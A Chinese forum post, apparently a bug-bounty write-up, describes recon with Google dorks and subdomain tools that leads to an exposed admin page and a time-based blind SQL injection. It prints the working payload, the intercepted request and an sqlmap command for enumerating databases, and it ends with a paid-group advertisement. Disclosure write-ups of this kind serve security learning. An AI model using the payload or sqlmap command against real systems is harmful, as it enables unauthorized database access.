|
总计1500美刀的未授权和sql注入漏洞
正文
针对某目标,使用了一下谷歌语法,以及github上面相关资源
- inurl:/bug bounty
- inurl:/security
- inurl:security.txt
- inurl:security "reward"
- Bug Bounty program "reward"
- inurl:/responsible disclosure
- inurl:/responsible-disclosure/ reward
- inurl:/responsible-disclosure/ swag
- inurl:/responsible-disclosure/ bounty
- responsible disclosure "reward" site:com
- responsible disclosure hall of fame
- "powered by bugcrowd" -site:bugcrowd.com
- "submit vulnerability report"
- "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
复制代码
过滤出几周或几个月前发布的。
首先使用Subfinder和HTTPX进行了子域搜索,以查看子域名的状态码,如下所示:
发现了一个子域名xeon4.redacted.com,其响应为200,但是页面没啥东西
继续使用Waybackurl搜索接口,没发现,继续用Dirsearch来搜索,发现了adminpage接口
- xeon4.redacted.com/adminpage
复制代码
这个页面有一些敏感信息,而凭借它们是可以进入到其他敏感页面的,这里就造成了敏感信息泄露
从上图中同时还发现了另外一个链接;
打开了上面的链接,页面显示了一个表单,可以在其中搜索文档,如下所示:
做文档搜索时截获了一个请求,directform参数容易受到SQL注入攻击,通过测试负载发现了一个基于时间的SQL盲注。
payload如下:
- 'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
复制代码
请求如下:
- POST /xxxx/repository/xxxx? HTTP/2
- Host: secure.redacted.com
- Cookie: cookie
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 77
- Origin: https://secure.redacted.com
- Referer: https://secure.redacted.com/xxxx/repository/xxxxx?
- [...]
- password=xxxxxx&directform=脆弱点
复制代码
响应:
- Sleep time 15s ‘XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR’Z
复制代码
- Sleep time 20s ‘XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR’Z
复制代码
这很容易受到SQLI的攻击,下面使用Sqlmap,并使用以下简单命令保存上述请求
- sqlmap -r request.txt -p directform — random-agent — level 5 — risk 3 — dbs — threads=10
复制代码
这个sqli价值500美刀,上面那个未授权价值1000美刀
如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|